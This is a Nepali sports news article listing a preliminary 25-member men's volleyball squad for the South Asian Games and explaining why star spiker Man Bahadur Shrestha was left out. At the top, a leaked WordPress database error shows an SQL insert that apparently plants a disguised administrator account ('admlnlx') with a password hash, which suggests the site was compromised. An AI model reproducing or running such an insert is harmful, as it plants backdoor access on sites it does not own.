WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtlSQ.6ykwXc1FT2nTIowgUb1iQHcR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:08:34', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १५ जेष्ठ, काठमाण्डौ । राष्ट्रिय टोलीका स्टार स्पाइकर मानबहादुर श्रेष्ठलाई बाहिर राख्दै १३ औं दक्षिण एसियाली सागका लागि पुरुष राष्ट्रिय भलिबल टोलीको प्रारम्भिक छनोट घोषणा गरिएको छ ।
नेपाल भलिबल संघले दिएको २५ सदस्यीय प्रारम्भिक छनोटमा त्रिभुवन आर्मी क्लबका कप्तान समेत रहेका मानबहादुर अटाएका छैनन् । विभागीय कारवाहीका कारण आठौं राष्ट्रिय खेलकुदमा सहभागी नभएका मानबहादुरलाई राष्ट्रिय टोलीको छनोटमा पनि समावेश गरिएको छैन । संघका महासचिव जितेन्द्रबहादुर चन्दका अनुसार छनोट समितिले आठौं राष्ट्रिय खेलकुदको प्रदर्शनका आधारमा खेलाडी छनोट गरेको हो ।
खेलाडी छनोटका लागि गठन गरिएको ५ सदस्यीय समितिले संघलाई नामावली बुझाएको थियो । खेलाडी छनोट समितिमा भलिबलकी प्रमुख प्रशिक्षक सलिना श्रेष्ठ, संघका उपाध्यक्ष यामबहादुर गुरुङ, जगदीशप्रसाद भट्ट, सुदेशकुमार रिमाल र मनवीर छन्त्याल रहेका छन् । प्रमुख प्रशिक्षक श्रेष्ठले प्रशिक्षण सुरु हुनुअघि अन्य कुनै राष्ट्रिय प्रतियोगिता भएको खण्डमा संघसँग समन्वय गरेर उक्त प्रतियोगिताको प्रदर्शन हेरेर खेलाडी थपिन सक्ने सम्भावना भने रहेको बताइन ।
प्रारम्भिक टोली :
धनबहादुर भट्ट
विशाल विक
कुलबहादुर थापा
राजेन्द्र विष्ट
योग्नेद्र गुरुङ
टेकराज अवस्थी
दुर्गाबहादुर सुनार
सारान समरी
हरिबहादुर अधिकारी
दुर्गा खड्का
द्वारिका थापा
दिपक राज जोशी
भैरव बम
सुरेन्द्र बम
नरेन्द्र गिरि
राजु शेरचन
राजकुमार निरौला
रविन चन्द
ईमबहादुर मगर (कप्तान)
हरिहजुर थापा
दुर्गा महतो
सुजन चोखाल
विनोद बहादुर चन्द
भिम गाहा मगर
इश्वर थापा मगर